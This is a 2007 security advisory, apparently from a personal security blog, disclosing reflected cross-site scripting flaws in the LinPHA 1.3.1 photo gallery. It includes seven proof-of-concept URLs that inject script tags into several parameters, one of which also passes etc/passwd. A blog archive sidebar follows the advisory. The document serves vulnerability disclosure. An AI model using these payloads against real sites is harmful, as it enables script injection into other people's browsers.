##########################################
LINPHA 1.3.1 Multiple Scripts XSS
vendor url:http://linpha.sourceforge.net
Advisore:http://lostmon.blogspot.com/2007/09/
linpha-131-multiple-scripts-xss.html
vendor informed:NO exploit available:YES
##########################################
LinPHA is an easy to use, multilingual, flexible photo/image
archive/album/gallery written in PHP. It uses a SQL database
(MySQL/PostgreSQL/SQLite) to store information about your pictures
LinPHA contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate multiple params upon submission to multiple scripts
.This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the
trust relationship between the browser and the server,
leading to a loss of integrity.
################
Versions
################
LinPHA 1.3.1
################
Timeline
################
Discovered:05-08-2007
disclosure:07-09-2007
###################
Examples
###################
http://localhost/linpha/actions/image_resized_view.php?
imgid=2945"><body><script>alert()</script><h1>lalala</h1></body>&wh=800x600
http://localhost/linpha/search.php?1=1&pn=2
"><script>alert()</script>#tn
http://localhost/linpha/viewer.php?album=etc/passwd">
<body><script>alert()</script><h1>lalala</h1></body>
http://localhost/linpha/search.php?1=1&order=">
<body><script>alert()</script><h1>lalala</h1></body>
http://localhost/linpha//search.php?1=1&imgid=14013">
<body><script>alert()</script><h1>lalala</h1></body>
http://localhost/linpha/search.php?1=1&imgid=14013">
<body><script>alert()</script><h1>lalala</h1></body>
http://localhost/linpha/search.php?search_text=a&order=">
<body><script>alert()</script><h1>lalala</h1></body>
Some other params and scripts are afected...
###################### €nd ###############################
Thnx to estrella to be my ligth
Thnx to all Lostmon´s Group Team
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
skip to main |
skip to sidebar
Security Research & Analisys:
Personal Blog where I expose my investigations,
advisores and some outstanding news on security.
Categories
Archives
-
►
2022
(2)
- ► November 2022 (1)
- ► October 2022 (1)
-
►
2013
(2)
- ► December 2013 (1)
- ► August 2013 (1)
-
►
2012
(5)
- ► April 2012 (1)
-
►
2011
(5)
- ► October 2011 (1)
- ► March 2011 (1)
-
►
2010
(18)
- ► December 2010 (2)
- ► September 2010 (1)
- ► March 2010 (1)
- ► February 2010 (1)
- ► January 2010 (1)
-
►
2009
(25)
- ► November 2009 (1)
- ► April 2009 (1)
- ► March 2009 (1)
- ► February 2009 (1)
-
►
2008
(24)
- ► August 2008 (9)
- ► April 2008 (1)
- ► March 2008 (1)
-
▼
2007
(29)
- ► October 2007 (1)
- ▼ September 2007 (2)
- ► March 2007 (1)
-
►
2006
(14)
- ► August 2006 (1)
- ► February 2006 (1)
-
►
2005
(54)
- ► December 2005 (1)
- ► April 2005 (14)
Browse
About:Me
My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com
La curiosidad es lo que hace
mover la mente...
Online Tools & Calculators
Posts
Lostmon Blogger © All Rights Reserved